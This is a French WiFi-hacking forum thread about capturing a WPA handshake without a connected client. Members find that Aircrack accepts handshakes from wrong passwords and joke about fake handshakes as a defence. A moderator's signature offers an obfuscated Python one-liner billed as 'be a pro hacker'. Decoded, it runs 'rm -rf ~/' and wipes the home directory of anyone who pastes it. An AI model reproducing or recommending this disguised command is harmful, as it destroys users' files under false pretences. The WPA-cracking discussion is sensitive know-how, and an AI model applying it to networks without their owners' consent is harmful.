Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-06-2010 09:50:16

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Capture handshake SANS station !

Salut
ben ...je ne sais plus

Pour le wpa, la première chose que j'ai apprise, c est qu'il faut impérativement une station connectée ..pour essayer de choper le handshake. OK! puisque sans le handshake, ..pas possible d'avancer

J ai un wifi, sur lequel , AUCUNE station n'est connectée. (j'ai bien observé). Mais j'ai 2 pc (1 XP et 1 BT3)  et 2 cartes ALFA

J'ai laissé le pc XP essayer de se connecter sur le wifi (avec une fausse clé wpa) ..

et hop! avec le backtrack (et spoonwpa), je capte le handshake !!!!!

TOUT me parait normal !!

(au fait j'ai essayé cette manipulation , sur qqes wifi SANS station de vraiment connectée...et ca a l'air de marcher)


Qu en pensez vous ??

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-06-2010 10:19:54

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Capture handshake SANS station !

Salut Yasmine !

Ce que j'en pense, c'est que si tu continues à faire tes tests sur les routeurs du voisinage ca va mal se passer roll (sauf si tu as leur accord).

Sinon, je viens de faire le même test que toi (sauf que j'utilise BackTrack et pas XP pour me connecter, j'ai + de détails), et effectivement Airodump détecte un handshake même si le mot de passe est faux smile J'avais jamais remarqué ca, donc j'ai creusé un peu et j'ai cracké le handshake en question, d'après Aircrack le mot de passe du réseau est le "mauvais" que j'ai donné ce coup-ci.

Il semble donc qu'Aircrack ne tienne pas compte du succès ou de l'échec du handshake pour le crack hmm Je pense que c'est dû au fait que dans les versions récentes, airodump et aircrack se contentent de 2 paquets sur les 4 du handshake, pour pouvoir cracker même des handshakes incomplets. Manque de bol, la confirmation du mot de passe se fait dans le 4ème paquet, qui ne semble plus du tout utilisé, d'où le problème de "fausse alerte" (fausse joie, dans le cas présent).

Bravo Yasmine, tu viens d'inventer un nouveau moyen de défense pour ton réseau WPA lol Tu peux configurer une machine pour se connecter à ton réseau toutes les 10 secondes avec des faux mots de passe, l'attaquant ne pourra jamais deviner quel handshake est le bon et donc ton réseau sera protégé big_smile

Bon, d'accord, ca vaut pas une bonne grosse clé aléatoire, mais le principe est amusant smile

[EDIT] Il faudrait vérifier avec Cowpatty, s'il sait faire la différence entre un "bon" et un "mauvais" handshake, tiens...

Hors Ligne

#3 30-06-2010 10:23:45

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Capture handshake SANS station !

antares145 a écrit :

(sauf si tu as leur accord).

Biensur ...

Et comment !!!  lol

Hors Ligne

#4 30-06-2010 21:01:57

Re : Capture handshake SANS station !

J'avais déjà testé la fake identification pour travailler sur le handshake, Bref comme on le sait sans succès, mais j'avais pas percuté sur le coup de faire un drone pour brouiller les pistes (et d'ajouter une sécurité supplémentaire), vive le wrt54 qui tourne H24 avec un drone qui fout le bronx wink


crsh.jpg

Hors Ligne

#5 24-08-2010 10:28:21

Syfer
Membre Indispensable
Inscription : 09-06-2010
Messages : 507
Site Web

Re : Capture handshake SANS station !

Très interessent ton explication Antares smile


masignature.gif

Hors Ligne

#6 18-03-2011 00:54:19

punisher_tunisia
Nouveau membre
Inscription : 18-03-2011
Messages : 8

Re : Capture handshake SANS station !

dans ce coup la j'ai admirer la creativité de yasmine
mais plus encore l'interprétation de antares145 smile comme mesure de sécurité

Hors Ligne

#7 05-04-2011 23:01:48

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Capture handshake SANS station !

Demain je monte ma boîte :

Je vendrai des cartes wifi spéciales (avec un petit bouclier dessus pour rassurer madame Michu)
qui à chaque deauth packet entendu, enverra des fake handshake tout en contrôlant les cartes de la box et du pc.

"HandFake"

Bon.. à dans 10 ans.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 19-04-2011 16:49:34

Charpy
N00b
Inscription : 14-04-2011
Messages : 3

Re : Capture handshake SANS station !

Arf, je me suis fait une fausse joie à la lecture de ton message, yasmine ^^'

antares, bien joué wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 867 22-10-2016 19:11:07 par Nawus
1 410 16-09-2016 14:06:28 par kcdtv
5 1855 21-08-2016 19:48:53 par M!C
2 373 08-08-2016 22:49:22 par Olympe
Vaccin sans aluminium par sardineeMule
1 580 28-06-2016 23:18:13 par s1lv3rf0x

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]